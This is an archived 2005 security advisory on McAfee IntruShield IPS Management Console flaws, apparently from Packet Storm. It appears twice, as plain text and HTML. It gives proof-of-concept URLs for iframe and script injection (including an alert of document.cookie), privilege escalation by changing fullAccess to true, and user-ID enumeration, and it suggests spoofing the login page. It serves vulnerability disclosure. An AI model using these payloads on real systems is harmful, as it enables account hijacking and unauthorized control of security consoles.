The McAfee Intrushield IPS Management Console has been found susceptible to html and javascript injection, privilege escalation, and unauthenticated report deletion.
e44cf0de8c358ef924cc85051e0b96755dce09ff74b6909f706270ab2278f337------=_Part_13419_25560245.1120660746428
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
/*
***************************************************************************=
**************************************
$ An open security advisory #8 - McAfee Intrushield IPS Management Console=
=20
Abuse
***************************************************************************=
**************************************
1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com
2: Bug Released: July 06 2005
3: Bug Impact Rate: Medium / Hi
4: Bug Scope Rate: Local / Remote
***************************************************************************=
**************************************
$ This advisory and/or proof of concept code must not be used for commercia=
l=20
gain.
***************************************************************************=
**************************************
McAfee IntruShield Security Management System
http://www.mcafeesecurity.com/us/products/mcafee/network_ips/category.htm
"The McAfee IntruShield Security Management System is an advanced solution=
=20
for administering IntruShield
sensor appliance deployments. The IntruShield Security Management System=20
(ISM) can support both large and
small network intrusion prevention system (IPS) deployments and can scale u=
p=20
to several hundred sensor
appliances. By integrating a comprehensive set of Best-in-Class security=20
management functions, the
IntruShield Security Management System dramatically simplifies and=20
streamlines the complexities associated
with IPS configuration, policy compliance, and threat and response=20
management."
I have found some security vulnerabilities in this product whereby a user=
=20
can elevate their privileges from
a user that can only view alerts logged by remote sensors, to a scenario=20
where the user can gain access to
acknowledge, accept and delete alerts and access the Management Console. It=
=20
is also possible to inject
malicious HTML and JavaScript into the URLS and have this malicious script=
=20
run on the clients machine,
allowing for account information hijacking.
A new version has been released to address these bugs and can be downloaded=
=20
from their site.
*/
Issues:=20
1) Inject HTML
2) Inject JavaScript
3) Access privileged reports
4) Acknowledge and delete alerts
5) Gain access to Management Console
Note: for issues 1 - 4, the attacker needs a valid user account.
1) It is possible to embed HTML into the MISMS. This could potentially allo=
w=20
phishing attacks to be performed
against a valid Manager account.
https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=
=3Dfalse&faultResourceName=3DManager&
domainName=3D%2FDemo%3A0&resourceName=3D%2FDemo%3A0%2FManager&resourceType=
=3DManager&
topMenuName=3DSystemHealthManager&secondMenuName=3DFaults&resourceId=3D-1&t=
hirdMenuName=3D<iframe%20src=3D"
http://www.mcafeesecurity.com/us/about/press/corporate/2005/20050411_185504=
.htm"%20width=3D800%20height=3D600
>
</iframe>&severity=3Dcritical&count=3D1
2) It is possible to embed JavaScript into the MISMS and have the embedded=
=20
script execute in the security
context of the user browsing the Management System.
https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=
=3Dfalse&faultResourceName=3DManager&
domainName=3DDemo&resourceName=3D<script>alert("There could be trouble=20
ahead")</script><script>alert(document.cookie)
</script>&resourceType=3DManager&topMenuName=3DSystemHealthManager&secondMe=
nuName=3DFaults&resourceId=3D-1&thirdMenuName=3D
Critical&severity=3Dcritical&count=3D1
3) It is possible to access the restricted "Generate Reports" section of th=
e=20
MISMS and as such, a non-privileged
user can gain important information regarding the configuration and set-up=
=20
of the IP devices being managed by the
Service. This can be achieved by simply changing the Access option from=20
false to true.
https://intrushield:443/intruvert/jsp/reports/reports-column-center.jsp?mon=
itoredDomain=3D%2FDemo&
selectedDomain=3D0&fullAccessRight=3Dtrue
4) It is possible to acknowledge, de-acknowledge and delete alerts from the=
=20
MISMS console by modifying URL's
sent to the system by simply changing the Access option from false to true.
https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=
=3Dtrue&faultResourceName=3DManager&
domainName=3D%2FDemo%3A0&resourceName=3D%Demo%3A0%2FManager&resourceType=3D=
Manager&
topMenuName=3DSystemHealthManager&secondMenuName=3DFaults&resourceId=3D-1&t=
hirdMenuName=3DCritical&severity=3D
critical&count=3D1
Each change is emailed out to the administrator, however the email only say=
s=20
that "someone" made a change.
5) As default, all user ID values are passed in the URL in the clear,=20
meaning that it is trivial for an attacker
to brute force accounts until a privileged Manager account is found. An=20
example of this would look similar to:
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=3D1&logo=3Dintru=
vert.gif
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=3D2&logo=3Dintru=
vert.gif
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=3D3&logo=3Dintru=
vert.gif
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=3D4&logo=3Dintru=
vert.gif
This process can be continued until a valid user ID has been found with=20
privileges to access the configure screen.
Since javascript can be run in the browsers of clients accessing the device=
,=20
it would be possible to redraw the page
with IFRAME's and recreate the user login page to snoop usersnames and=20
passwords.
------=_Part_13419_25560245.1120660746428
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
/*<br>
********************************************************************=
*********************************************<br>
$ An open security advisory #8 - McAfee Intrushield IPS Management C=
onsole Abuse<br>
********************************************************************=
*********************************************<br>
1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com<br>
2: Bug Released: July 06 2005<br>
3: Bug Impact Rate: Medium / Hi<br>
4: Bug Scope Rate: Local / Remote<br>
********************************************************************=
*********************************************<br>
$ This advisory and/or proof of concept code must not be used for co=
mmercial gain.<br>
********************************************************************=
*********************************************<br>
<br>
McAfee IntruShield Security Management System<br>
<a href=3D"http://www.mcafeesecurity.com/us/products/mcafee/network_=
ips/category.htm">http://www.mcafeesecurity.com/us/products/mcafee/network_=
ips/category.htm</a><br>
<br>
<br>
"The McAfee IntruShield Security Management System is an advanc=
ed solution for administering IntruShield<br>
sensor appliance deployments. The IntruShield Security Management Sy=
stem (ISM) can support both large and<br>
small network intrusion prevention system (IPS) deployments and can =
scale up to several hundred sensor<br>
appliances. By integrating a comprehensive set of Best-in-Class secu=
rity management functions, the<br>
IntruShield Security Management System dramatically simplifies and s=
treamlines the complexities associated<br>
with IPS configuration, policy compliance, and threat and response m=
anagement."<br>
<br>
I have found some security vulnerabilities in this product whereby a=
user can elevate their privileges from<br>
a user that can only view alerts logged by remote sensors, to a scen=
ario where the user can gain access to<br>
acknowledge, accept and delete alerts and access the Management Cons=
ole. It is also possible to inject<br>
malicious HTML and JavaScript into the URLS and have this malicious =
script run on the clients machine,<br>
allowing for account information hijacking.<br>
<br>
A new version has been released to address these bugs and can be dow=
nloaded from their site.<br>
<br>
*/<br>
<br>
Issues: <br>
1) Inject HTML<br>
2) Inject JavaScript<br>
3) Access privileged reports<br>
4) Acknowledge and delete alerts<br>
5) Gain access to Management Console<br>
<br>
Note: for issues 1 - 4, the attacker needs a valid user account.<br>
<br>
1) It is possible to embed HTML into the MISMS. This could potential=
ly allow phishing attacks to be performed<br>
against a valid Manager account.<br>
<br>
<a href=3D"https://intrushield/intruvert/jsp/systemHealth/SystemEven=
t.jsp?fullAccess=3Dfalse&faultResourceName=3DManager&">https://intr=
ushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=3Dfalse&f=
aultResourceName=3DManager&
</a><br>
domainName=3D%2FDemo%3A0&resourceName=3D%2FDemo%3A0%2FManager&am=
p;resourceType=3DManager&<br>
topMenuName=3DSystemHealthManager&secondMenuName=3DFaults&re=
sourceId=3D-1&thirdMenuName=3D<iframe%20src=3D"<br>
<a href=3D"http://www.mcafeesecurity.com/us/about/press/corporate/20=
05/20050411_185504.htm"%20width=3D800%20height=3D600">http://www.mcafe=
esecurity.com/us/about/press/corporate/2005/20050411_185504.htm"%20wid=
th=3D800%20height=3D600
</a>><br>
</iframe>&severity=3Dcritical&count=3D1<br>
<br>
<br>
2) It is possible to embed JavaScript into the MISMS and have the em=
bedded script execute in the security<br>
context of the user browsing the Management System.<br>
<br>
<a href=3D"https://intrushield/intruvert/jsp/systemHealth/SystemEven=
t.jsp?fullAccess=3Dfalse&faultResourceName=3DManager&">https://intr=
ushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=3Dfalse&f=
aultResourceName=3DManager&
</a><br>
domainName=3DDemo&resourceName=3D<script>alert("There
could be trouble
ahead")</script><script>alert(document.cookie)<br>
</script>&resourceType=3DManager&topMenuName=3DSystemHealthMa=
nager&secondMenuName=3DFaults&resourceId=3D-1&thirdMenuName=3D<=
br>
Critical&severity=3Dcritical&count=3D1<br>
<br>
<br>
3) It is possible to access the restricted "Generate Reports" sectio=
n of the MISMS and as such, a non-privileged<br>
user can gain important information regarding the configuration and =
set-up of the IP devices being managed by the<br>
Service. This can be achieved by simply changing the Access option f=
rom false to true.<br>
<br>
<a href=3D"https://intrushield:443/intruvert/jsp/reports/reports-col=
umn-center.jsp?monitoredDomain=3D%2FDemo&">https://intrushield:443/intr=
uvert/jsp/reports/reports-column-center.jsp?monitoredDomain=3D%2FDemo&<=
/a><br>
selectedDomain=3D0&fullAccessRight=3Dtrue<br>
<br>
<br>
4) It is possible to acknowledge, de-acknowledge and delete alerts f=
rom the MISMS console by modifying URL's<br>
sent to the system by simply changing the Access option from false t=
o true.<br>
<br>
<a href=3D"https://intrushield/intruvert/jsp/systemHealth/SystemEven=
t.jsp?fullAccess=3Dtrue&faultResourceName=3DManager&">https://intru=
shield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=3Dtrue&fau=
ltResourceName=3DManager&
</a><br>
domainName=3D%2FDemo%3A0&resourceName=3D%Demo%3A0%2FManager&=
resourceType=3DManager&<br>
topMenuName=3DSystemHealthManager&secondMenuName=3DFaults&re=
sourceId=3D-1&thirdMenuName=3DCritical&severity=3D<br>
critical&count=3D1<br>
<br>
Each change is emailed out to the administrator, however the email o=
nly says that "someone" made a change.<br>
<br>
5) As default, all user ID values are passed in the URL in the clear=
, meaning that it is trivial for an attacker<br>
to brute force accounts until a privileged Manager account is found.=
An example of this would look similar to:<br>
<br>
<a href=3D"https://intrushield:443/intruvert/jsp/menu/disp.jsp?userI=
d=3D1&logo=3Dintruvert.gif">https://intrushield:443/intruvert/jsp/menu/=
disp.jsp?userId=3D1&logo=3Dintruvert.gif</a><br>
<a href=3D"https://intrushield:443/intruvert/jsp/menu/disp.jsp?userI=
d=3D2&logo=3Dintruvert.gif">https://intrushield:443/intruvert/jsp/menu/=
disp.jsp?userId=3D2&logo=3Dintruvert.gif</a><br>
<a href=3D"https://intrushield:443/intruvert/jsp/menu/disp.jsp?userI=
d=3D3&logo=3Dintruvert.gif">https://intrushield:443/intruvert/jsp/menu/=
disp.jsp?userId=3D3&logo=3Dintruvert.gif</a><br>
<a href=3D"https://intrushield:443/intruvert/jsp/menu/disp.jsp?userI=
d=3D4&logo=3Dintruvert.gif">https://intrushield:443/intruvert/jsp/menu/=
disp.jsp?userId=3D4&logo=3Dintruvert.gif</a><br>
<br>
This process can be continued until a valid user ID has been found w=
ith privileges to access the configure screen.<br>
<br>
Since javascript can be run in the browsers of clients accessing the=
device, it would be possible to redraw the page<br>
with IFRAME's and recreate the user login page to snoop usersnames a=
nd passwords.<br>
<br>
<br>
------=_Part_13419_25560245.1120660746428--
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed